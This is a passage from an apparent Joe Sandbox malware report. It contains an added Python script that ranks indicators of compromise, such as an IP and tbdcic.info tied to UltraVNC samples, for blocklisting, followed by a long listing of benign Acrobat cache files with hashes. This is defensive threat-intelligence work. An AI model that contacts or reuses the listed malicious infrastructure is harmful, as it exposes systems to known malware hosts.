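The correlation tables above pivot from this sample to earlier submissions through shared indicators, and the pivots are not equally useful. 194.190.152.201 and tbdcic.info only ever co-occur with UltraVNC verdicts, while bg.microsoft.map.fastly.net (a Fastly CDN name; one of the addresses it resolved to, 199.232.210.172, is in the sandbox's own whitelisted IP list above) and the RSHB-ASRU ASN also carry LockBit ransomware/Metasploit, Reverse SSH and RedLine samples. The Python below is an added example, not part of the Joe Sandbox report or its tooling: it transcribes the rows above and ranks every indicator by how specific it is to the UltraVNC verdict, so an analyst can separate a pivot worth blocking or hunting on from shared infrastructure. The specificity score and the 1.0 cut-off are this example's assumptions.

```python
"""Rank the report's correlation pivots by how specific they are to one family.

Added example; not part of the Joe Sandbox report. CORRELATION_ROWS is
transcribed from the IP, domain and ASN correlation tables above; the
specificity score and its threshold are this example's own assumptions.
"""

# (indicator, indicator type, related sample, threat name) as the report lists
# them. The report repeats mSRW5AfJpC.exe under several indicators; one row per
# sample is kept here.
CORRELATION_ROWS = [
    ("194.190.152.201", "ip", "mSRW5AfJpC.exe", "UltraVNC"),
    ("194.190.152.201", "ip", "7q551ugrWe.exe", "UltraVNC"),
    ("194.190.152.201", "ip", "Olz7TmvkEW.exe", "UltraVNC"),
    ("bg.microsoft.map.fastly.net", "domain", "mSRW5AfJpC.exe", "UltraVNC"),
    ("bg.microsoft.map.fastly.net", "domain", "q8b3OisMC4.dll", "Unknown"),
    ("bg.microsoft.map.fastly.net", "domain", "7q551ugrWe.exe", "UltraVNC"),
    ("bg.microsoft.map.fastly.net", "domain", "Olz7TmvkEW.exe", "UltraVNC"),
    ("bg.microsoft.map.fastly.net", "domain", "eszstwQPwq.ps1", "LockBit ransomware, Metasploit"),
    ("bg.microsoft.map.fastly.net", "domain", "0vM02qWRT9.ps1", "LockBit ransomware, Metasploit"),
    ("bg.microsoft.map.fastly.net", "domain", "#U5b89#U88c5#U52a9#U624b_2.0.8.exe", "Unknown"),
    ("bg.microsoft.map.fastly.net", "domain", "fiFdIrd.txt.js", "Unknown"),
    ("tbdcic.info", "domain", "mSRW5AfJpC.exe", "UltraVNC"),
    ("tbdcic.info", "domain", "7q551ugrWe.exe", "UltraVNC"),
    ("tbdcic.info", "domain", "Olz7TmvkEW.exe", "UltraVNC"),
    ("RSHB-ASRU", "asn", "mSRW5AfJpC.exe", "UltraVNC"),
    ("RSHB-ASRU", "asn", "7q551ugrWe.exe", "UltraVNC"),
    ("RSHB-ASRU", "asn", "Olz7TmvkEW.exe", "UltraVNC"),
    ("RSHB-ASRU", "asn", "Scan_Zakaz_1416-02-24_13-02-2024.jpg.lnk", "Reverse SSH"),
    ("RSHB-ASRU", "asn", "Scan_Zayavlenie_1416-02-24_13-02-2024.jpg.lnk", "Reverse SSH"),
    ("RSHB-ASRU", "asn", "document.jpg.lnk", "Reverse SSH"),
    ("RSHB-ASRU", "asn", "tiago.exe", "Reverse SSH"),
    ("RSHB-ASRU", "asn", "0EZ9Ho3Ruc.exe", "RedLine"),
]


def pivot_summary(rows):
    """Collapse rows into {indicator: {"type": str, "samples": {sample: threat}}}.
    Keying on sample name removes the duplicated rows the report carries."""
    summary = {}
    for indicator, kind, sample, threat in rows:
        entry = summary.setdefault(indicator, {"type": kind, "samples": {}})
        entry["samples"][sample] = threat
    return summary


def specificity(entry, family):
    """Fraction of distinct related samples whose threat name is `family`.
    1.0: every sample seen on this indicator got the same verdict.
    Lower: the indicator is shared infrastructure (CDN, hosting ASN) and a
    weak pivot on its own."""
    verdicts = entry["samples"].values()
    return sum(1 for threat in verdicts if threat == family) / len(entry["samples"])


def rank_pivots(rows, family):
    """Return (indicator, specificity, distinct sample count, sorted threat names),
    most specific first; more corroborating samples first on ties."""
    summary = pivot_summary(rows)
    ordered = sorted(
        summary.items(),
        key=lambda item: (-specificity(item[1], family), -len(item[1]["samples"]), item[0]),
    )
    return [
        (indicator, specificity(entry, family), len(entry["samples"]),
         sorted(set(entry["samples"].values())))
        for indicator, entry in ordered
    ]


def blockable_pivots(rows, family, min_specificity=1.0):
    """Indicators whose every related sample in the report carried `family`.
    The strict 1.0 default is an assumption: a single unrelated family on an
    indicator is enough to treat it as shared infrastructure."""
    return [indicator for indicator, spec, _, _ in rank_pivots(rows, family)
            if spec >= min_specificity]


if __name__ == "__main__":
    for indicator, spec, count, threats in rank_pivots(CORRELATION_ROWS, "UltraVNC"):
        print(f"{indicator:30} specificity={spec:.3f} samples={count} threats={threats}")
    print("blockable:", blockable_pivots(CORRELATION_ROWS, "UltraVNC"))
```

On the rows above this yields two pivots at 1.0 (the IP and tbdcic.info) and puts the Fastly name and the ASN at 0.375 with three distinct threat names each. A 1.0 built on three samples is corroboration from the sandbox's own submission history, not proof; the IP and domain still deserve the usual checks (hosting provider, shared hosting, when the domain was registered) before they go into a blocklist.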
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):294
                                                                          Entropy (8bit):5.195270130887246
                                                                          Encrypted:false
                                                                          SSDEEP:6:1Iq2PCHhJ2nKuAl9OmbnIFUt8pZmw+/IkwOCHhJ2nKuAl9OmbjLJ:+vBHAahFUt8p/+A56HAaSJ
                                                                          MD5:69EF59459CFFD64E60C0F0A9120E4B46
                                                                          SHA1:9C27D4FE90EEA23A4D90414FBC41C39F3141206D
                                                                          SHA-256:11F432064C2707588A8BDC3CE310C21B2C3CEB69E859F62B08FE16E5CED1478C
                                                                          SHA-512:B5F673B017E1CB6704EE68E47BF94C222F11EBEC5F44D04B010F72D30CF941DAF309D3B9DD2DFFEC485133B8FD16757DA71327758D8CF6843F031B8060AC68D3
                                                                          Malicious:false
                                                                          Preview:2024/12/23-07:38:07.900 1790 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/23-07:38:07.903 1790 Recovering log #3.2024/12/23-07:38:07.904 1790 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):294
                                                                          Entropy (8bit):5.195270130887246
                                                                          Encrypted:false
                                                                          SSDEEP:6:1Iq2PCHhJ2nKuAl9OmbnIFUt8pZmw+/IkwOCHhJ2nKuAl9OmbjLJ:+vBHAahFUt8p/+A56HAaSJ
                                                                          MD5:69EF59459CFFD64E60C0F0A9120E4B46
                                                                          SHA1:9C27D4FE90EEA23A4D90414FBC41C39F3141206D
                                                                          SHA-256:11F432064C2707588A8BDC3CE310C21B2C3CEB69E859F62B08FE16E5CED1478C
                                                                          SHA-512:B5F673B017E1CB6704EE68E47BF94C222F11EBEC5F44D04B010F72D30CF941DAF309D3B9DD2DFFEC485133B8FD16757DA71327758D8CF6843F031B8060AC68D3
                                                                          Malicious:false
                                                                          Preview:2024/12/23-07:38:07.900 1790 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/23-07:38:07.903 1790 Recovering log #3.2024/12/23-07:38:07.904 1790 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):335
                                                                          Entropy (8bit):5.1798968773727125
                                                                          Encrypted:false
                                                                          SSDEEP:6:eAvAQyq2PCHhJ2nKuAl9Ombzo2jMGIFUt8V0DG1Zmw+VaVSQRkwOCHhJ2nKuAl97:eA9yvBHAa8uFUt8Cc/+YjR56HAa8RJ
                                                                          MD5:20FAB29F627C38E5F9EF6A755406DCA1
                                                                          SHA1:FA1A338F04E9AB0DE7D63CBDC553EB0708C37A82
                                                                          SHA-256:A1E65992B9E620503F780264C9E6D9D0D0C6A018778015F98778CDAC153DBAC9
                                                                          SHA-512:280CAEA9C3B50B827EEB89C45904ACCF5EF4D26ED91DCEA10E4593A6A2D173574E51D5FD1A5A20F19285F79C2A63844215BB50425D7ECC362619CAFFE2F2A13F
                                                                          Malicious:false
                                                                          Preview:2024/12/23-07:38:07.999 f90 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/23-07:38:08.001 f90 Recovering log #3.2024/12/23-07:38:08.002 f90 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):335
                                                                          Entropy (8bit):5.1798968773727125
                                                                          Encrypted:false
                                                                          SSDEEP:6:eAvAQyq2PCHhJ2nKuAl9Ombzo2jMGIFUt8V0DG1Zmw+VaVSQRkwOCHhJ2nKuAl97:eA9yvBHAa8uFUt8Cc/+YjR56HAa8RJ
                                                                          MD5:20FAB29F627C38E5F9EF6A755406DCA1
                                                                          SHA1:FA1A338F04E9AB0DE7D63CBDC553EB0708C37A82
                                                                          SHA-256:A1E65992B9E620503F780264C9E6D9D0D0C6A018778015F98778CDAC153DBAC9
                                                                          SHA-512:280CAEA9C3B50B827EEB89C45904ACCF5EF4D26ED91DCEA10E4593A6A2D173574E51D5FD1A5A20F19285F79C2A63844215BB50425D7ECC362619CAFFE2F2A13F
                                                                          Malicious:false
                                                                          Preview:2024/12/23-07:38:07.999 f90 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/23-07:38:08.001 f90 Recovering log #3.2024/12/23-07:38:08.002 f90 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):475
                                                                          Entropy (8bit):4.963247713778661
                                                                          Encrypted:false
                                                                          SSDEEP:12:YH/um3RA8sqRYSsBdOg2HEcaq3QYiub6P7E4TX:Y2sRds9dMHX3QYhbS7n7
                                                                          MD5:D46529E824E6E834D0D750C5560C136C
                                                                          SHA1:E6597929E439E6AF24CE7249F0D303987F0760BF
                                                                          SHA-256:818753A5C6D3C843FBA032CCB1B1681F6226C17B388A1E3052774B1DD8809C72
                                                                          SHA-512:CE939B02393B7F46CE528527A40DCB56023CF6682B664D5685354CDA51388EE603FCAF018A428EFB08AD5800B68847F6F512B05F6D772E435507EE32BCEA0963
                                                                          Malicious:false
                                                                          Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341054937965898","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146333},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.8","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):475
                                                                          Entropy (8bit):4.963247713778661
                                                                          Encrypted:false
                                                                          SSDEEP:12:YH/um3RA8sqRYSsBdOg2HEcaq3QYiub6P7E4TX:Y2sRds9dMHX3QYhbS7n7
                                                                          MD5:D46529E824E6E834D0D750C5560C136C
                                                                          SHA1:E6597929E439E6AF24CE7249F0D303987F0760BF
                                                                          SHA-256:818753A5C6D3C843FBA032CCB1B1681F6226C17B388A1E3052774B1DD8809C72
                                                                          SHA-512:CE939B02393B7F46CE528527A40DCB56023CF6682B664D5685354CDA51388EE603FCAF018A428EFB08AD5800B68847F6F512B05F6D772E435507EE32BCEA0963
                                                                          Malicious:false
                                                                          Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341054937965898","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146333},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.8","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):475
                                                                          Entropy (8bit):4.963247713778661
                                                                          Encrypted:false
                                                                          SSDEEP:12:YH/um3RA8sqRYSsBdOg2HEcaq3QYiub6P7E4TX:Y2sRds9dMHX3QYhbS7n7
                                                                          MD5:D46529E824E6E834D0D750C5560C136C
                                                                          SHA1:E6597929E439E6AF24CE7249F0D303987F0760BF
                                                                          SHA-256:818753A5C6D3C843FBA032CCB1B1681F6226C17B388A1E3052774B1DD8809C72
                                                                          SHA-512:CE939B02393B7F46CE528527A40DCB56023CF6682B664D5685354CDA51388EE603FCAF018A428EFB08AD5800B68847F6F512B05F6D772E435507EE32BCEA0963
                                                                          Malicious:false
                                                                          Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341054937965898","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146333},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.8","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:JSON data
                                                                          Category:modified
                                                                          Size (bytes):475
                                                                          Entropy (8bit):4.965604377944479
                                                                          Encrypted:false
                                                                          SSDEEP:12:YH/um3RA8sq70hsBdOg2HEAcaq3QYiub6P7E4TX:Y2sRds2dMHEr3QYhbS7n7
                                                                          MD5:C74C689E298AA244CE21A9702B9659FD
                                                                          SHA1:BCA453B6A241A5391E08DADBE71C916A963CB3D6
                                                                          SHA-256:18672BB673CA91F5AE0EAABB56F22AC800B079E82CDFCE7930C8D4439138A3D2
                                                                          SHA-512:3619253A1C276083D478A0E3DA34C55508AC9F242A36CF093B19970C2CA6AB533F3AE2A20EFC34251A5ADCD52917804BEC12776C1C22AFF1529BEBE8FE2FEF13
                                                                          Malicious:false
                                                                          Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379517496928884","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":769977},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.8","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):3878
                                                                          Entropy (8bit):5.235757676495416
                                                                          Encrypted:false
                                                                          SSDEEP:96:S4bz5vsZ4CzSAsfTxiVud4TxY0CIOr3MCWO3VxBaw+bZNkdzc:S43C4mS7fFi0KFYDjr3LWO3V3aw+bZee
                                                                          MD5:62BB98586AE0CB3B6D84BF7A0DEBC844
                                                                          SHA1:011F7CBD17EB62521C590771D792AA00F93FE0DA
                                                                          SHA-256:4D4A68F9F64C215C1BD32D340972340432C184C4D6618A10270C5193CC1317DA
                                                                          SHA-512:F4226E639CAE1BF23EE4E49BB4A404870965E6F1109E7D6920B93F565090166ED16FB7ED3E51450882251F8E51D606F67F4E60F647C9833CE6CB1BA2779B2621
                                                                          Malicious:false
                                                                          Preview:*...#................version.1..namespace-8..|o................next-map-id.1.Pnamespace-656dc224_0825_4dad_892f_a4fe9098071c-https://rna-resource.acrobat.com/.0...dr................next-map-id.2.Snamespace-ef12e1ab_9f14_41d7_aae3_3f05adf09ebc-https://rna-v2-resource.acrobat.com/.1....r................next-map-id.3.Snamespace-07eb38e9_046b_46c4_bd67_b1578df56145-https://rna-v2-resource.acrobat.com/.2.$..o................next-map-id.4.Pnamespace-f0c0a73c_e89b_42d5_bb63_4f8a3b04cf3a-https://rna-resource.acrobat.com/.3+...^...............Pnamespace-656dc224_0825_4dad_892f_a4fe9098071c-https://rna-resource.acrobat.com/....^...............Pnamespace-f0c0a73c_e89b_42d5_bb63_4f8a3b04cf3a-https://rna-resource.acrobat.com/T.3.a...............Snamespace-ef12e1ab_9f14_41d7_aae3_3f05adf09ebc-https://rna-v2-resource.acrobat.com/.U..a...............Snamespace-07eb38e9_046b_46c4_bd67_b1578df56145-https://rna-v2-resource.acrobat.com/.$..o................next-map-id.5.Pnamespace-c66013b9_73b6_4b3f_b279_
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):323
                                                                          Entropy (8bit):5.216169555019848
                                                                          Encrypted:false
                                                                          SSDEEP:6:2nvwQyq2PCHhJ2nKuAl9OmbzNMxIFUt8VBG1Zmw+V+QRkwOCHhJ2nKuAl9OmbzNq:CyvBHAa8jFUt84/+pR56HAa84J
                                                                          MD5:B982F7D604B2A53FDC5EB7934C28B1CC
                                                                          SHA1:43BE6BBB3ACA50A0CB0EA92DB686A88890F19E1F
                                                                          SHA-256:B5093B30C6E5F563E362FBC2DC1A1F5799D935403E3316642BC38C7C112BCE51
                                                                          SHA-512:928A167F00029384D308323921570614C4ED250AB289F55169079B66A8E78DD26C53852A922A45E43195E56D60D998144B6D68A8249E8661193EC1F07D8DBB2C
                                                                          Malicious:false
                                                                          Preview:2024/12/23-07:38:08.791 f90 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/23-07:38:08.792 f90 Recovering log #3.2024/12/23-07:38:08.793 f90 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):323
                                                                          Entropy (8bit):5.216169555019848
                                                                          Encrypted:false
                                                                          SSDEEP:6:2nvwQyq2PCHhJ2nKuAl9OmbzNMxIFUt8VBG1Zmw+V+QRkwOCHhJ2nKuAl9OmbzNq:CyvBHAa8jFUt84/+pR56HAa84J
                                                                          MD5:B982F7D604B2A53FDC5EB7934C28B1CC
                                                                          SHA1:43BE6BBB3ACA50A0CB0EA92DB686A88890F19E1F
                                                                          SHA-256:B5093B30C6E5F563E362FBC2DC1A1F5799D935403E3316642BC38C7C112BCE51
                                                                          SHA-512:928A167F00029384D308323921570614C4ED250AB289F55169079B66A8E78DD26C53852A922A45E43195E56D60D998144B6D68A8249E8661193EC1F07D8DBB2C
                                                                          Malicious:false
                                                                          Preview:2024/12/23-07:38:08.791 f90 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/23-07:38:08.792 f90 Recovering log #3.2024/12/23-07:38:08.793 f90 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:PC bitmap, Windows 3.x format, 110 x -152 x 32, cbSize 66934, bits offset 54
                                                                          Category:dropped
                                                                          Size (bytes):66934
                                                                          Entropy (8bit):2.436424201832609
                                                                          Encrypted:false
                                                                          SSDEEP:384:kkjiDp0Pogvn5pgqlzaekiqtyQqdRslkdMCC/J0Xum3O5JMZ5lQnsN:kkjcp0GhekH1qv7Jis/3zN
                                                                          MD5:EDF4BC620FE407C6970CDAF5585ADE74
                                                                          SHA1:FF838C5205409B571B5FA183F69EEAAE321F9AE6
                                                                          SHA-256:9ADA9F269BC6944820567EE88B25DAF845BB152B8FA8AB2B49327371AA056234
                                                                          SHA-512:84CB20C3B5FC59B2ACA0402F262A52A1BEDCE267D29E57BE2FA16F96437C13CC60375FFD12BC71BDA2297E5C53F4FBE9747CC86119A3CBE4260D14694499F210
                                                                          Malicious:false
                                                                          Preview:BMv.......6...(...n...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:Certificate, Version=3
                                                                          Category:dropped
                                                                          Size (bytes):1391
                                                                          Entropy (8bit):7.705940075877404
                                                                          Encrypted:false
                                                                          SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                          MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                          SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                          SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                          SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                          Malicious:false
                                                                          Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                          Category:dropped
                                                                          Size (bytes):71954
                                                                          Entropy (8bit):7.996617769952133
                                                                          Encrypted:true
                                                                          SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                          MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                          SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                          SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                          SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                          Malicious:false
                                                                          Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):192
                                                                          Entropy (8bit):2.7673182398396405
                                                                          Encrypted:false
                                                                          SSDEEP:3:kkFkluvbbNl1fllXlE/HT8kCNNX8RolJuRdxLlGB9lQRYwpDdt:kK3vVQT8hNMa8RdWBwRd
                                                                          MD5:0EDDABEA1A4DEEAF9968EAE9A11406A1
                                                                          SHA1:DF7D8CABF5A835F8A3E8095D1BE355F858C2C7EF
                                                                          SHA-256:F42277DBD3EA4805BAB5491DE55F986ECAE712C2E5D0960322CC40E7DF68E731
                                                                          SHA-512:3D5BA4BE187AACEB2C47A1977EBC1940E0D3AEF2064A24659143024D7CEFF27228D33E7FEFD4056D3A1A64036C47F5C321476FE41771F0ECF727ED76D1DEA5DD
                                                                          Malicious:false
                                                                          Preview:p...... ............7U..(....................................................... ..........W....................o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):328
                                                                          Entropy (8bit):3.2478978672539016
                                                                          Encrypted:false
                                                                          SSDEEP:6:kK5bNF9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:hbqDImsLNkPlE99SNxAhUe/3
                                                                          MD5:537BA9355A62C9F0A1257D31E0F45290
                                                                          SHA1:900EDE94CEEE26726DA4509D8731B4AC88E0C396
                                                                          SHA-256:EF65F4C699ECF39D3D768C74289AC50612CEC40D2C5F9BCAFF79CA8F038BB1DB
                                                                          SHA-512:6B199559814383C2AED5B445CA279BE1477D58169BC935525C17295FCBD48BDC733147E2CC30E5A7E1E3F3FF61CAEEAF8A2C0C5E309B0A624D29C495E86F4210
                                                                          Malicious:false
                                                                          Preview:p...... ........_.R.7U..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):295
                                                                          Entropy (8bit):5.301770223587704
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXpvIuaIER2vB3/dVlPIHAR0YaxoAvJM3g98kUwPeUkwRe9:YvXKXFvEAvR/ZwHAmOGMbLUkee9
                                                                          MD5:F9BB69312AD481FE9D4D2480535CEA47
                                                                          SHA1:EABBC2F97E310974E318B0D73856FE0108201F29
                                                                          SHA-256:A91C5548568000C4E094FE2BA4C80110BE72D153D630BAB7D4AEBDCACBC11B8D
                                                                          SHA-512:9A1D579CDE20331A02C09D7122DF8DB9F25D5BF7799475415332D313B4D3B0DD79B4B6D98DF8E2B30C05B564494935F181AAAA82044BA86866BBC4FCDFB6EA7F
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"daf80ece-a1e4-4da0-871f-a04ed11e940c","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735133209818,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):294
                                                                          Entropy (8bit):5.232395490985208
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXpvIuaIER2vB3/dVlPIHAR0YaxoAvJfBoTfXpnrPeUkwRe9:YvXKXFvEAvR/ZwHAmOGWTfXcUkee9
                                                                          MD5:E85CF7BA012380AB3EB658DB7B008D3E
                                                                          SHA1:E81D4BF6994E73273ACCC263C66066130DA3052D
